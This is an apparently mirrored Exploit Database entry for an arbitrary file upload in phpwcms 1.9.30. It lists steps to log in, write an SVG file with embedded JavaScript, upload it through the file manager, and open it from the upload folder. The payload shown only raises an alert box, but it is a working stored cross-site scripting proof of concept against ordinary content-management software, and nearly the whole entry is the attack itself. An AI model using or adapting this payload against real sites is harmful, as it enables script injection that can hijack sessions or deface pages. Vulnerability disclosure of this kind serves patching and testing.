Phpwcms 1.9.30 – Arbitrary File Upload

• Exploit Database
• 37 阅读

• 作者： Okan Kurtulus
  日期： 2021-10-01
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50363/

• # Exploit Title: Phpwcms 1.9.30 - Arbitrary File Upload
  # Date: 30/9/2021
  # Exploit Author: Okan Kurtulus | okankurtulus.com.tr
  # Software Link: http://www.phpwcms.org/
  # Version: 1.9.30
  # Tested on: Ubuntu 16.04
  
  Steps:
  
  1-) You need to login to the system.
  http://target.com/phpwcms/login.php
  
  2-) Creating payload with SVG extension: payload.svg
  
  <?xml version="1.0" standalone="no"?>
  <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
  
  <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(255,0,0);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
  alert("XSS!");
   </script>
  </svg>
  
  
  3-) Go to the following link and upload the payload:
  http://target.com/phpwcms/phpwcms.php?csrftoken=b72d02a26550b9877616c851aa6271be&do=files&p=8
  
  From the menu:
  
  file -> multiple file upload -> Select files or drop here
  
  4-) After uploading payload, call it from the link below.
  
  http://192.168.1.112/phpwcms/upload/